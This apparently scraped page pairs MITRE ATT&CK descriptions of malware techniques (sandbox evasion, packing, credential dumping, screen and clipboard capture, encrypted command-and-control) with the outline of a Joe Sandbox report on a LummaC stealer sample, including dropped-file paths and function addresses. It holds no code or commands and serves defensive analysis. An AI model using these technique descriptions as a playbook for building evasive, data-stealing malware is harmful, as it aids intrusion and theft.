Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report uU6IvUPN39.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_uU6IvUPN39.exe_f093859966f3c1712e279d1ef72333ad3dbe5255_e95f9628_52a747ec-8ea1-4de0-b31c-cad117897a5b\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD6D6.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD7D1.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD7F1.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
uU6IvUPN39.exe

Function 0043B870 Relevance: 37.6, APIs: 11, Strings: 10, Instructions: 880
memorycomCOMMON

Function 00408880 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 180
threadCOMMON

Function 00421E70 Relevance: 4.2, Strings: 3, Instructions: 435
COMMON

Function 006AAF5E Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 0040AA32 Relevance: 2.6, Strings: 2, Instructions: 64
COMMON

Function 0213003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 0040E3D3 Relevance: 3.1, APIs: 2, Instructions: 120
COMMON

Function 02130E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Function 0040DF92 Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Function 0040AB12 Relevance: 1.5, APIs: 1, Instructions: 20
networkCOMMON